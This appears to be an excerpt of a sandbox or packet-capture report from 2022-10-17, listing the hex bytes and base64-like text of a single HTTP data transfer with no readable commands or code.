                                                                                                                                  2022-10-17 20:07:12 UTC522INData Raw: 66 2f 77 43 38 2f 62 77 4a 6e 36 6e 71 74 48 2f 5a 4c 6e 37 68 65 58 2f 4a 74 65 6a 54 34 33 54 30 48 78 33 7a 37 50 70 31 65 46 53 33 2b 6c 66 37 34 54 64 6e 2b 75 2f 51 57 67 4e 53 37 31 62 6e 66 2f 73 77 70 71 2f 63 50 67 66 68 73 39 70 30 61 66 46 6c 64 50 32 46 78 76 78 31 37 50 70 31 65 46 54 2b 31 58 37 79 42 2f 36 68 2b 69 50 51 2b 70 2f 6d 4c 50 75 48 77 65 37 32 6e 64 36 32 73 2f 59 50 47 62 7a 52 33 75 6f 77 2f 70 58 2b 37 76 38 41 4e 2b 34 2f 6f 37 52 6f 52 39 51 76 2f 77 43 77 46 4d 2f 75 4a 77 6e 77 32 57 76 75 39 61 34 2b 77 65 4c 2b 4f 30 30 64 37 71 56 2f 74 54 2b 35 6d 6e 37 6e 2b 6d 69 76 79 33 2b 39 6d 57 50 63 54 68 74 31 72 36 63 4e 65 33 2f 45 37 33 52 30 5a 45 66 30 70 2f 63 69 51 2f 37 70 2b 6d 41 4a 71 4c 62 79 5a 55 7a 2b 34 6e
                                                                                                                                  Data Ascii: f/wC8/bwJn6nqtH/ZLn7heX/JtejT43T0Hx3z7Pp1eFS3+lf74Tdn+u/QWgNS71bnf/swpq/cPgfhs9p0afFldP2Fxvx17Pp1eFT+1X7yB/6h+iPQ+p/mLPuHwe72nd62s/YPGbzR3uow/pX+7v8AN+4/o7RoR9Qv/wCwFM/uJwnw2Wvu9a4+weL+O00d7qV/tT+5mn7n+mivy3+9mWPcTht1r6cNe3/E73R0ZEf0p/ciQ/7p+mAJqLbyZUz+4n
                                                                                                                                  2022-10-17 20:07:12 UTC524INData Raw: 73 2f 63 47 50 38 41 31 6e 70 63 66 39 53 6e 75 44 78 2f 79 62 4c 6f 31 65 4d 39 42 63 44 38 2b 30 36 64 50 68 45 66 30 74 2f 59 43 78 2f 32 76 39 77 44 30 2b 66 30 76 39 55 6e 75 46 78 2f 79 62 4c 6f 31 65 4d 39 42 63 44 38 2b 30 36 64 50 68 62 2b 31 2f 38 41 4c 37 46 76 31 66 37 69 66 2b 30 39 4c 2f 56 4a 37 68 63 66 38 6d 79 36 4e 58 6a 50 51 58 41 2f 50 74 4f 6e 54 34 53 2f 32 75 2f 59 57 50 38 41 34 7a 39 66 30 50 71 65 6c 2f 71 6b 39 77 65 50 2b 54 5a 39 47 72 78 6e 6f 50 67 66 6e 32 6e 54 70 38 4a 76 37 58 2f 79 2b 78 50 2b 31 2f 75 4d 66 39 5a 36 58 2b 71 54 33 42 34 2f 35 4e 6c 30 61 76 47 76 6f 50 67 66 6e 32 6e 54 70 38 4c 66 32 76 38 41 35 66 38 41 2f 77 44 4c 2f 63 48 6e 48 2f 53 65 6c 70 2f 32 53 65 34 50 48 2f 4a 73 75 6a 56 34 7a 30 48 77
                                                                                                                                  Data Ascii: s/cGP8A1npcf9SnuDx/ybLo1eM9BcD8+06dPhEf0t/YCx/2v9wD0+f0v9UnuFx/ybLo1eM9BcD8+06dPhb+1/8AL7Fv1f7if+09L/VJ7hcf8my6NXjPQXA/PtOnT4S/2u/YWP8A4z9f0Pqel/qk9weP+TZ9GrxnoPgfn2nTp8Jv7X/y+xP+1/uMf9Z6X+qT3B4/5Nl0avGvoPgfn2nTp8Lf2v8A5f8A/wDL/cHnH/Selp/2Se4PH/JsujV4z0Hw
                                                                                                                                  2022-10-17 20:07:12 UTC525INData Raw: 50 31 2f 36 50 48 53 66 55 2f 77 41 78 62 39 77 75 44 33 65 30 37 76 57 78 36 43 34 76 65 61 4f 39 31 42 2f 61 33 39 35 64 68 2b 76 2f 41 45 51 30 72 36 6e 2b 59 6e 75 46 77 65 37 32 6e 64 36 7a 30 48 78 65 38 30 64 37 71 53 75 2f 70 68 2b 2f 42 32 2f 57 66 6f 43 42 2f 6c 2b 71 44 2f 38 41 53 35 57 38 66 75 44 77 48 78 30 62 54 6f 30 2b 4a 7a 7a 39 69 63 62 6a 6d 31 37 50 70 31 65 45 44 2f 53 2f 39 2f 46 70 50 2b 30 2f 74 35 4f 74 6f 39 54 31 58 2f 38 41 70 4b 34 2f 63 48 79 2f 50 35 4e 70 30 61 66 45 6d 66 73 54 6a 76 6e 32 66 54 71 38 4b 58 39 73 66 35 68 4c 2f 77 43 6c 2f 52 51 66 2f 69 33 2f 41 4f 72 58 54 31 39 35 64 2f 70 74 4f 6a 48 69 5a 39 44 63 66 2f 72 6f 36 63 39 53 56 2f 38 41 54 58 2b 59 37 61 48 39 4a 65 42 55 32 2b 71 59 38 62 51 74 61 66
                                                                                                                                  Data Ascii: P1/6PHSfU/wAxb9wuD3e07vWx6C4veaO91B/a395dh+v/AEQ0r6n+YnuFwe72nd6z0Hxe80d7qSu/ph+/B2/WfoCB/l+qD/8AS5W8fuDwHx0bTo0+Jzz9icbjm17Pp1eED/S/9/FpP+0/t5Oto9T1X/8ApK4/cHy/P5Np0afEmfsTjvn2fTq8KX9sf5hL/wCl/RQf/i3/AOrXT195d/ptOjHiZ9Dcf/ro6c9SV/8ATX+Y7aH9JeBU2+qY8bQtaf
                                                                                                                                  2022-10-17 20:07:12 UTC526INData Raw: 56 42 59 57 36 43 41 2b 79 67 73 4c 54 44 47 4b 4d 67 59 53 53 42 32 5a 57 42 78 61 51 51 30 67 2b 39 4b 4b 67 4d 52 58 37 46 41 34 74 4a 66 68 77 37 6f 48 74 46 4f 36 6d 51 7a 4f 48 45 67 31 4b 4b 59 57 73 51 47 67 31 36 6f 68 73 58 49 4e 78 49 5a 2f 50 6b 49 4b 4d 42 41 6b 6e 54 32 43 67 41 74 59 66 34 68 41 59 51 77 31 56 6f 63 41 67 4d 30 37 6a 6e 77 55 55 57 4e 77 49 33 69 56 42 6d 49 67 48 78 30 37 4b 6b 47 53 43 52 72 78 35 36 49 43 41 62 74 47 47 67 4d 6f 70 6d 63 41 38 51 53 67 47 46 7a 43 6b 53 4f 71 41 75 78 64 36 6a 57 50 61 71 41 73 51 4e 52 51 63 7a 71 67 4f 4a 4f 37 51 34 4d 66 65 67 62 46 71 42 78 78 34 6f 41 52 70 49 42 31 6f 7a 66 67 67 59 57 38 6b 6d 65 69 44 4f 54 49 70 71 5a 46 61 55 51 62 67 43 42 54 7a 51 59 33 55 41 4c 79 42 34 70
                                                                                                                                  Data Ascii: VBYW6CA+ygsLTDGKMgYSSB2ZWBxaQQ0g+9KKgMRX7FA4tJfhw7oHtFO6mQzOHEg1KKYWsQGg16ohsXINxIZ/PkIKMBAknT2CgAtYf4hAYQw1VocAgM07jnwUUWNwI3iVBmIgHx07KkGSCRrx56ICAbtGGgMopmcA8QSgGFzCkSOqAuxd6jWPaqAsQNRQczqgOJO7Q4MfegbFqBxx4oARpIB1ozfggYW8kmeiDOTIpqZFaUQbgCBTzQY3UALyB4p
                                                                                                                                  2022-10-17 20:07:12 UTC528INData Raw: 36 30 53 6a 59 41 43 34 66 77 75 35 74 53 68 6d 48 79 6e 6b 6c 39 6a 35 4a 55 4e 55 47 42 53 58 34 62 68 4b 6f 57 76 69 41 52 6a 31 69 45 42 78 6c 33 63 36 68 32 53 68 6a 61 43 4d 53 5a 6f 53 66 61 55 6f 4c 6c 36 53 4e 51 32 71 44 45 55 31 74 4b 55 59 6d 68 49 4c 45 78 62 71 67 77 4c 66 4b 38 42 67 34 47 76 56 41 42 4a 44 2f 41 4a 6e 4c 64 49 53 67 75 7a 79 41 52 2b 59 37 4f 67 77 79 65 61 48 54 74 77 6c 42 30 4d 4d 52 55 48 79 55 6f 7a 61 41 55 5a 77 66 73 56 6f 49 48 35 70 59 58 46 78 35 4b 55 43 6b 4d 65 57 6c 4b 4d 31 70 74 6d 58 4c 74 30 53 68 72 52 61 52 75 34 69 4a 6c 4d 35 42 4c 79 42 34 6b 39 31 4b 41 4d 69 42 55 52 56 57 6a 50 49 44 41 37 6a 54 33 4b 41 76 6b 64 52 69 31 44 75 67 7a 53 44 41 36 56 53 67 4d 54 6a 71 31 57 32 53 6a 43 52 62 4c 41
                                                                                                                                  Data Ascii: 60SjYAC4fwu5tShmHynkl9j5JUNUGBSX4bhKoWviARj1iEBxl3c6h2ShjaCMSZoSfaUoLl6SNQ2qDEU1tKUYmhILExbqgwLfK8Bg4GvVABJD/AJnLdISguzyAR+Y7OgwyeaHTtwlB0MMRUHyUozaAUZwfsVoIH5pYXFx5KUCkMeWlKM1ptmXLt0ShrRaRu4iJlM5BLyB4k91KAMiBURVWjPIDA7jT3KAvkdRi1DugzSDA6VSgMTjq1W2SjCRbLA
                                                                                                                                  2022-10-17 20:07:12 UTC529INData Raw: 32 67 37 50 76 57 45 47 79 75 49 41 61 6f 49 34 53 41 6c 67 57 5a 7a 4a 5a 6b 47 6b 4e 6f 47 4a 78 72 4b 45 59 6d 34 69 43 2b 67 4c 66 59 67 33 46 70 46 70 31 6a 34 49 51 41 43 7a 45 42 32 44 61 30 36 6f 51 48 31 42 72 4c 69 76 32 71 77 61 30 30 4c 4f 34 66 57 75 69 42 69 58 69 35 51 5a 79 47 44 6a 52 77 4b 6f 41 4d 67 57 67 73 7a 64 50 75 51 4e 78 74 32 48 62 78 51 4b 62 32 49 42 4a 45 56 61 4f 31 55 67 78 4a 4a 6a 55 56 30 51 5a 33 49 30 4a 4c 6b 49 4e 6b 51 34 44 63 6b 6f 43 58 4e 5a 68 77 57 38 59 51 59 58 45 6d 72 73 48 68 49 4e 2b 56 32 72 71 67 78 4c 4f 78 71 32 71 41 5a 51 51 66 6c 42 6a 70 32 51 59 33 48 2b 45 5a 5a 66 6c 45 55 37 70 41 58 4e 44 7a 33 44 30 51 5a 79 53 4d 67 35 49 32 51 41 45 68 78 48 54 62 33 49 43 2b 52 65 51 66 38 54 66 61 67
                                                                                                                                  Data Ascii: 2g7PvWEGyuIAaoI4SAlgWZzJZkGkNoGJxrKEYm4iC+gLfYg3FpFp1j4IQACzEB2Da06oQH1BrLiv2qwa00LO4fWuiBiXi5QZyGDjRwKoAMgWgszdPuQNxt2HbxQKb2IBJEVaO1UgxJJjUV0QZ3I0JLkINkQ4DckoCXNZhwW8YQYXEmrsHhIN+V2rqgxLOxq2qAZQQflBjp2QY3H+EZZflEU7pAXNDz3D0QZySMg5I2QAEhxHTb3IC+ReQf8Tfag
                                                                                                                                  2022-10-17 20:07:12 UTC530INData Raw: 6a 58 61 57 5a 51 59 73 48 66 33 2b 62 31 51 43 52 61 41 43 4d 6a 41 75 50 6a 71 6c 42 71 37 47 47 67 31 66 70 4b 44 43 54 41 4c 50 7a 56 74 58 51 45 6e 6a 35 54 55 2b 39 41 41 2f 79 6b 47 6c 53 57 6a 68 41 49 71 53 53 4c 71 6b 55 43 41 73 41 4a 50 79 69 43 4b 39 45 6f 50 38 41 37 30 73 44 31 51 41 6b 69 4e 4e 53 66 67 79 41 45 76 42 47 73 62 76 56 41 47 44 4d 62 51 43 7a 45 68 6e 72 38 56 61 4d 62 52 6f 4e 6d 71 2b 2f 73 79 55 4a 55 51 59 47 6b 39 31 61 47 4f 67 71 53 58 72 33 55 41 64 79 41 58 6c 74 6c 52 6f 75 4d 4f 41 58 30 6a 75 67 4e 4e 4b 43 69 6c 41 42 4a 42 59 45 41 65 4d 4b 6a 4d 37 77 35 45 7a 41 31 64 51 4a 63 47 64 33 36 56 44 64 4f 55 41 6d 6b 47 77 43 64 55 6f 78 68 33 4e 42 44 61 44 78 33 51 4b 44 52 79 64 41 77 4f 74 55 51 44 38 78 4c 39
                                                                                                                                  Data Ascii: jXaWZQYsHf3+b1QCRaACMjAuPjqlBq7GGg1fpKDCTALPzVtXQEnj5TU+9AA/ykGlSWjhAIqSSLqkUCAsAJPyiCK9EoP8A70sD1QAkiNNSfgyAEvBGsbvVAGDMbQCzEhnr8VaMbRoNmq+/syUJUQYGk91aGOgqSXr3UAdyAXltlRouMOAX0jugNNKCilABJBYEAeMKjM7w5EzA1dQJcGd36VDdOUAmkGwCdUoxh3NBDaDx3QKDRydAwOtUQD8xL9
                                                                                                                                  2022-10-17 20:07:12 UTC532INData Raw: 45 43 45 56 2f 77 36 67 2f 63 71 46 75 41 6c 6e 41 75 4b 42 43 4e 6f 6c 71 61 37 6f 4a 33 48 58 78 4c 49 45 49 4a 65 68 63 56 66 52 55 54 75 44 45 6e 55 36 2b 33 52 42 48 55 75 65 6e 4b 42 51 44 4c 6c 32 54 4b 59 53 59 56 45 39 30 56 43 34 54 4f 76 77 56 52 7a 47 43 77 6f 58 63 44 77 56 45 53 4e 69 30 50 43 49 6a 66 52 36 38 4b 34 48 4c 63 48 42 6a 6f 66 59 71 34 48 4e 64 55 68 76 46 42 4a 6a 6b 33 6d 6a 4c 6b 39 50 46 6e 41 35 44 61 72 57 52 31 32 65 2b 69 7a 6c 56 37 64 78 58 51 6f 72 72 74 48 47 79 67 36 4c 53 4a 75 33 2b 43 6d 52 61 31 68 79 4e 4b 66 42 46 64 46 67 68 33 41 4f 2b 69 67 36 41 47 42 31 59 65 78 52 56 37 61 77 59 55 44 68 70 41 37 6f 6d 44 69 30 77 77 71 61 76 75 6c 56 63 41 47 47 70 54 34 4b 55 4d 48 65 34 30 47 73 6f 4c 57 67 58 4f 4e
                                                                                                                                  Data Ascii: ECEV/w6g/cqFuAlnAuKBCNolqa7oJ3HXxLIEIJehcVfRUTuDEnU6+3RBHUuenKBQDLl2TKYSYVE90VC4TOvwVRzGCwoXcDwVESNi0PCIjfR68K4HLcHBjofYq4HNdUhvFBJjk3mjLk9PFnA5DarWR12e+izlV7dxXQorrtHGyg6LSJu3+CmRa1hyNKfBFdFgh3AO+ig6AGB1YexRV7awYUDhpA7omDi0wwqavulVcAGGpT4KUMHe40GsoLWgXON
                                                                                                                                  2022-10-17 20:07:12 UTC533INData Raw: 64 66 5a 31 49 4b 69 35 73 74 42 51 48 33 70 41 39 70 4c 47 6a 73 37 39 65 69 51 59 79 47 78 49 65 70 2b 78 55 55 45 50 46 61 36 44 75 73 35 47 63 31 6b 6e 57 30 48 34 53 72 41 32 57 70 74 62 4b 6f 50 43 52 52 65 68 49 37 44 63 6f 48 42 74 74 41 42 62 59 42 49 47 79 46 42 4a 50 32 4a 41 70 75 79 59 59 74 70 74 32 68 49 4e 6b 48 63 6d 73 57 6e 72 73 6b 42 4e 7a 69 51 5a 68 68 79 6b 42 42 31 4c 68 74 41 47 2b 47 71 67 64 32 4c 67 67 41 62 71 4b 55 58 55 61 31 6d 2f 4d 41 33 68 34 71 78 42 79 41 63 73 57 32 66 6e 71 79 6b 56 6e 31 49 41 32 63 30 56 52 73 6d 4e 78 6d 35 71 4a 42 73 67 48 74 6f 35 6a 66 77 53 41 53 61 31 4d 62 48 64 42 73 71 41 57 67 45 48 7a 31 53 41 35 52 6f 37 51 58 69 53 6b 47 79 42 32 59 54 38 55 69 6d 6c 68 6b 53 4b 65 78 4b 52 44 41 74
                                                                                                                                  Data Ascii: dfZ1IKi5stBQH3pA9pLGjs79eiQYyGxIep+xUUEPFa6Dus5Gc1knW0H4SrA2WptbKoPCRRehI7DcoHBttABbYBIGyFBJP2JApuyYYtpt2hINkHcmsWnrskBNziQZhhykBB1LhtAG+Gqgd2LggAbqKUXUa1m/MA3h4qxByAcsW2fnqykVn1IA2c0VRsmNxm5qJBsgHto5jfwSASa1MbHdBsqAWgEHz1SA5Ro7QXiSkGyB2YT8UimlhkSKexKRDAt
                                                                                                                                  2022-10-17 20:07:12 UTC534INData Raw: 36 56 41 61 4f 58 68 57 68 71 41 44 73 36 69 73 48 65 36 4b 30 50 73 79 55 4c 53 6c 6f 42 6b 6c 35 37 71 31 42 2b 59 74 4d 4e 33 55 6f 7a 76 4e 76 56 74 36 4d 71 4e 38 73 47 33 74 38 57 53 68 72 52 4c 58 42 36 6b 4f 70 56 4e 75 77 65 72 41 46 68 30 43 55 43 61 67 67 67 52 61 33 32 6c 57 6f 4c 4e 71 34 49 5a 6d 30 47 69 56 51 47 49 2b 59 79 47 63 46 6b 71 43 2f 5a 79 2f 77 42 78 55 55 51 37 6b 30 63 2f 64 4b 55 41 50 55 4f 5a 6f 2b 36 55 45 50 42 6f 47 70 38 41 6c 41 42 4a 41 4f 68 46 58 6e 6f 67 49 41 49 61 31 67 4b 67 69 6a 70 52 67 61 75 47 30 62 78 31 51 5a 68 55 41 54 38 55 6f 55 48 5a 33 50 42 66 66 56 56 47 42 68 78 2b 59 68 41 31 6f 4c 45 58 54 76 74 35 71 5a 79 70 53 58 75 63 62 66 6c 4a 62 58 5a 56 42 61 47 2f 4b 4a 6d 67 38 45 6f 42 44 33 42 35
                                                                                                                                  Data Ascii: 6VAaOXhWhqADs6isHe6K0PsyULSloBkl57q1B+YtMN3UozvNvVt6MqN8sG3t8WShrRLXB6kOpVNuwerAFh0CUCagggRa32lWoLNq4IZm0GiVQGI+YyGcFkqC/Zy/wBxUUQ7k0c/dKUAPUOZo+6UEPBoGp8AlABJAOhFXnogIAIa1gKgijpRgauG0bx1QZhUAT8UoUHZ3PBffVVGBhx+YhA1oLEXTvt5qZypSXucbflJbXZVBaG/KJmg8EoBD3B5
                                                                                                                                  2022-10-17 20:07:12 UTC536INData Raw: 50 4b 4b 44 75 51 57 63 6b 4d 39 73 78 72 35 6f 6a 4e 72 55 47 42 45 41 49 72 47 4b 7a 4f 6a 2b 4c 49 67 78 52 38 57 2f 4b 48 31 39 69 69 74 38 7a 61 67 69 47 4a 6e 72 79 67 7a 68 32 41 4a 5a 70 30 71 67 41 59 67 69 72 36 36 6e 32 71 69 4d 61 7a 53 65 42 52 30 47 6e 45 6b 43 6f 6a 70 32 52 57 41 2b 61 54 42 70 37 30 42 4a 63 5a 41 74 46 42 71 67 42 4e 6f 6f 53 43 37 74 55 6f 6a 45 53 57 30 32 41 72 6f 45 42 44 75 63 51 77 45 4e 43 4b 41 6b 77 43 41 65 47 59 2b 77 52 47 63 6c 73 58 6f 34 67 49 70 70 47 6e 42 31 36 49 41 47 4e 57 4e 70 6d 4a 66 76 77 69 41 41 37 31 42 6f 78 6e 65 71 44 43 37 6f 51 50 7a 44 64 2b 45 67 49 48 7a 51 77 41 44 41 49 6f 53 4c 6f 6e 2f 4a 64 79 33 4c 38 6f 47 4d 44 38 6f 6f 78 65 41 33 6d 67 41 42 74 5a 79 34 63 4e 44 4d 69 46 63
                                                                                                                                  Data Ascii: PKKDuQWckM9sxr5ojNrUGBEAIrGKzOj+LIgxR8W/KH19iit8zagiGJnrygzh2AJZp0qgAYgir66n2qiMazSeBR0GnEkCojp2RWA+aTBp70BJcZAtFBqgBNooSC7tUojESW02AroEBDucQwENCKAkwCAeGY+wRGclsXo4gIppGnB16IAGNWNpmJfvwiAA71BoxneqDC7oQPzDd+EgIHzQwADAIoSLon/Jdy3L8oGMD8ooxeA3mgABtZy4cNDMiFc
                                                                                                                                  2022-10-17 20:07:12 UTC537INData Raw: 77 49 4b 55 45 56 5a 2f 77 44 68 42 4b 4e 77 51 78 49 6c 41 41 7a 43 37 46 67 48 62 75 6c 51 58 33 69 5a 50 47 69 4b 55 6e 45 4f 42 49 35 6a 37 45 6f 58 57 54 51 69 4b 70 51 64 69 58 41 64 41 47 49 41 34 45 73 50 63 6c 42 6b 78 42 5a 36 7a 77 6c 43 73 51 62 6f 47 4c 54 4e 64 2f 63 72 55 45 34 67 66 4e 49 41 59 6b 36 67 4b 56 53 6e 38 78 75 79 61 33 55 66 46 6c 61 68 69 53 53 77 36 6a 32 62 68 52 52 49 44 69 75 34 43 55 59 62 6d 6c 51 55 6f 58 49 69 53 47 41 33 68 55 4b 78 63 75 39 7a 55 53 6a 41 47 41 4b 44 6e 32 30 53 68 51 77 2f 79 64 32 2b 50 69 72 55 4d 32 4d 42 67 4b 6b 71 56 51 46 77 65 34 76 46 46 51 4c 69 48 66 6d 56 4b 4a 6b 77 62 6d 4a 34 42 4b 71 44 4d 46 32 68 37 6b 6f 58 38 74 78 69 4b 6d 35 36 41 71 56 41 75 49 42 62 46 75 45 77 46 6d 43 48
                                                                                                                                  Data Ascii: wIKUEVZ/wDhBKNwQxIlAAzC7FgHbulQX3iZPGiKUnEOBI5j7EoXWTQiKpQdiXAdAGIA4EsPclBkxBZ6zwlCsQboGLTNd/crUE4gfNIAYk6gKVSn8xuya3UfFlahiSSw6j2bhRRIDiu4CUYbmlQUoXIiSGA3hUKxcu9zUSjAGAKDn20ShQw/yd2+PirUM2MBgKkqVQFwe4vFFQLiHfmVKJkwbmJ4BKqDMF2h7koX8txiKm56AqVAuIBbFuEwFmCH
                                                                                                                                  2022-10-17 20:07:12 UTC538INData Raw: 43 45 69 43 77 61 69 42 48 59 4f 4a 66 32 4b 43 52 65 58 6b 69 66 46 31 6f 54 75 75 37 6d 6a 6e 37 6b 45 62 6d 6f 65 48 4f 69 44 47 6d 6a 31 5a 51 63 35 67 55 79 6d 69 6f 6c 63 44 78 78 38 56 52 7a 33 47 72 53 2f 76 56 48 50 64 63 4a 42 6f 4b 4f 69 49 33 33 4f 43 38 41 56 5a 56 48 4c 66 51 69 64 68 37 46 55 63 31 39 30 74 74 56 49 49 73 63 33 69 71 74 52 77 57 58 41 62 6c 79 71 4f 71 79 34 45 75 7a 79 6f 52 30 32 33 4e 4a 70 52 52 58 54 5a 66 37 65 78 52 58 54 5a 66 44 38 51 6f 52 30 57 33 43 6e 6b 6f 4c 32 33 68 78 71 51 56 46 58 39 4f 38 4f 7a 36 4b 43 77 75 41 6b 4f 59 67 49 4b 69 37 74 56 6d 33 51 68 38 33 59 37 6d 6d 34 51 57 74 76 4a 30 2b 55 39 46 46 68 37 53 34 38 73 66 77 56 70 44 32 33 4d 34 70 76 48 34 71 5a 46 51 52 57 62 68 52 51 68 38 32 4c
                                                                                                                                  Data Ascii: CEiCwaiBHYOJf2KCReXkifF1oTuu7mjn7kEbmoeHOiDGmj1ZQc5gUymiolcDxx8VRz3GrS/vVHPdcJBoKOiI33OC8AVZVHLfQidh7FUc190ttVIIsc3iqtRwWXAblyqOqy4EuzyoR023NJpRRXTZf7exRXTZfD8QoR0W3CnkoL23hxqQVFX9O8Oz6KCwuAkOYgIKi7tVm3Qh83Y7mm4QWtvJ0+U9FFh7S48sfwVpD23M4pvH4qZFQRWbhRQh82L
                                                                                                                                  2022-10-17 20:07:12 UTC540INData Raw: 6f 4b 68 68 49 31 4b 41 75 37 69 68 32 51 56 74 4c 53 49 66 58 32 4b 43 6f 5a 6a 55 36 45 49 47 42 70 4d 61 48 5a 41 39 76 79 73 35 71 58 6c 52 54 68 77 78 59 52 4c 42 41 34 49 4a 45 69 33 55 50 74 73 67 4d 32 7a 55 56 50 52 41 37 69 6a 44 72 78 6f 70 41 51 64 4f 49 42 4b 67 49 42 45 47 68 4e 4b 36 4b 30 59 79 30 54 6f 56 56 47 72 6d 66 38 41 4a 2b 33 7a 55 42 46 31 43 58 49 75 4c 71 68 67 58 4a 59 4d 52 54 53 44 52 51 41 42 67 77 44 75 38 36 65 53 6f 4c 4d 78 72 7a 76 73 67 59 43 65 6a 2b 61 67 55 77 58 4a 30 59 6d 6b 38 71 67 41 43 41 34 4a 4d 47 64 70 2b 4b 42 73 73 53 4e 48 38 74 31 49 47 79 4c 51 48 36 30 53 44 43 68 6f 78 70 30 30 44 49 43 54 6f 77 4d 54 38 46 41 41 4b 7a 71 38 52 58 6f 67 30 51 52 71 64 50 59 49 4d 41 44 38 77 63 5a 50 42 47 39 55
                                                                                                                                  Data Ascii: oKhhI1KAu7ih2QVtLSIfX2KCoZjU6EIGBpMaHZA9vys5qXlRThwxYRLBA4IJEi3UPtsgM2zUVPRA7ijDrxopAQdOIBKgIBEGhNK6K0Yy0ToVVGrmf8AJ+3zUBF1CXIuLqhgXJYMRTSDRQABgwDu86eSoLMxrzvsgYCej+agUwXJ0Ymk8qgACA4JMGdp+KBssSNH8t1IGyLQH60SDChoxp00DICTowMT8FAAKzq8RXog0QRqdPYIMAD8wcZPBG9U
                                                                                                                                  2022-10-17 20:07:12 UTC540INData Raw: 38 30 30 30 0d 0a 74 61 58 5a 7a 32 51 45 6b 73 43 4e 4e 59 51 62 4a 78 46 41 57 59 68 49 4d 42 4e 70 4c 6b 6a 58 33 6f 41 61 73 5a 50 38 51 30 38 55 42 49 44 79 65 51 43 48 68 42 75 4d 58 74 4f 30 6f 42 4e 30 41 67 6a 78 51 46 36 37 53 7a 46 6b 47 35 6b 50 39 72 6f 41 5a 62 66 53 4e 57 35 45 49 43 53 41 61 31 31 68 41 41 48 6a 35 57 65 4e 77 32 2f 52 42 74 77 34 2f 79 6d 32 6c 41 58 75 63 45 4d 41 49 50 58 79 51 61 70 49 59 68 78 49 71 67 46 32 78 71 32 7a 70 67 59 45 45 79 42 49 68 74 6c 52 68 63 44 54 2f 6a 61 39 6c 49 46 46 77 30 41 6c 7a 6c 33 66 75 72 42 6d 4d 50 4a 71 37 49 4d 2f 44 76 70 30 4e 45 41 65 68 2f 4e 73 58 31 56 47 35 62 72 62 30 51 44 6e 2b 45 31 39 6d 51 47 34 4f 51 31 32 4c 46 4d 44 45 30 41 4a 50 4d 31 32 64 51 4b 58 75 68 32 48 6d
                                                                                                                                  Data Ascii: 8000taXZz2QEksCNNYQbJxFAWYhIMBNpLkjX3oAasZP8Q08UBIDyeQCHhBuMXtO0oBN0AgjxQF67SzFkG5kP9roAZbfSNW5EICSAa11hAAHj5WeNw2/RBtw4/ym2lAXucEMAIPXyQapIYhxIqgF2xq2zpgYEEyBIhtlRhcDT/ja9lIFFw0Alzl3furBmMPJq7IM/Dvp0NEAeh/NsX1VG5brb0QDn+E19mQG4OQ12LFMDE0AJPM12dQKXuh2Hm
                                                                                                                                  2022-10-17 20:07:12 UTC541INData Raw: 59 49 63 42 2f 6d 71 67 6d 53 44 46 74 41 59 51 4b 5a 71 32 33 68 73 6c 43 45 6d 34 31 48 63 55 56 51 44 57 72 6b 31 4b 56 55 72 69 4b 55 71 79 55 53 79 6b 68 32 62 72 50 52 45 4b 37 53 50 77 2b 4b 43 64 31 32 6f 41 6f 57 43 43 64 78 5a 39 5a 47 53 59 56 43 36 34 53 65 37 71 6f 69 64 7a 2b 43 74 45 4c 72 69 54 42 42 33 4c 6f 6a 6e 75 75 45 37 45 73 36 6f 68 66 64 42 49 68 35 56 48 4d 53 51 2f 6c 73 71 79 35 37 79 4a 30 32 54 41 67 2f 7a 2f 42 55 63 4e 68 34 51 58 74 4e 50 4a 42 30 32 45 77 65 6e 5a 51 64 4e 68 67 50 48 66 56 51 64 4e 70 41 50 57 71 69 72 32 48 62 53 6f 68 54 4b 75 69 30 73 58 4e 47 39 69 67 75 43 37 52 46 58 55 46 52 63 58 64 32 48 38 49 35 53 4b 74 61 57 37 53 56 42 65 64 4e 4a 6f 69 71 41 67 36 37 4f 56 42 54 4b 48 5a 75 61 70 67 45 58
                                                                                                                                  Data Ascii: YIcB/mqgmSDFtAYQKZq23hslCEm41HcUVQDWrk1KVUriKUqyUSykh2brPREK7SPw+KCd12oAoWCCdxZ9ZGSYVC64Se7qoidz+CtELriTBB3LojnuuE7Es6ohfdBIh5VHMSQ/lsqy57yJ02TAg/z/BUcNh4QXtNPJB02EwenZQdNhgPHfVQdNpAPWqir2HbSohTKui0sXNG9iguC7RFXUFRcXd2H8I5SKtaW7SVBedNJoiqAg67OVBTKHZuapgEX
                                                                                                                                  2022-10-17 20:07:12 UTC543INData Raw: 67 76 76 76 32 55 42 46 44 4d 6d 6f 4d 2f 59 71 43 51 51 50 7a 4e 73 58 5a 41 63 6a 30 69 70 70 4b 6b 42 59 55 59 63 39 48 51 46 6a 63 42 38 56 41 51 57 6d 6d 36 41 4f 78 66 51 37 30 39 36 6f 49 4c 36 73 47 59 4e 37 30 57 74 71 43 7a 4e 4c 69 6e 4f 36 41 6d 41 53 4b 6d 73 46 41 51 54 4f 4e 77 4a 5a 32 51 59 58 58 55 50 45 63 64 6b 42 4a 4e 4a 66 2f 41 42 42 41 52 64 54 6e 57 6e 69 67 77 46 64 72 76 45 2b 4b 41 6d 57 6d 4e 36 55 38 45 47 6d 70 6f 4a 47 36 42 63 6d 49 4a 44 4d 4b 68 57 42 67 78 66 35 5a 36 56 64 51 5a 32 5a 71 2b 32 37 49 41 2f 59 77 43 4f 32 69 41 51 5a 49 6d 36 67 64 2f 44 52 41 30 73 33 38 4a 45 45 61 31 51 61 58 6a 57 6a 7a 53 71 44 46 32 4a 71 57 33 70 33 51 46 32 75 45 73 2f 6d 55 41 46 77 64 6e 2f 4b 59 46 61 30 51 59 50 70 65 34 61
                                                                                                                                  Data Ascii: gvvv2UBFDMmoM/YqCQQPzNsXZAcj0ippKkBYUYc9HQFjcB8VAQWmm6AOxfQ7096oIL6sGYN70WtqCzNLinO6AmASKmsFAQTONwJZ2QYXXUPEcdkBJNJf/ABBARdTnWnigwFdrvE+KAmWmN6U8EGmpoJG6BcmIJDMKhWBgxf5Z6VdQZ2Zq+27IA/YwCO2iAQZIm6gd/DRA0s38JEEa1QaXjWjzSqDF2JqW3p3QF2uEs/mUAFwdn/KYFa0QYPpe4a
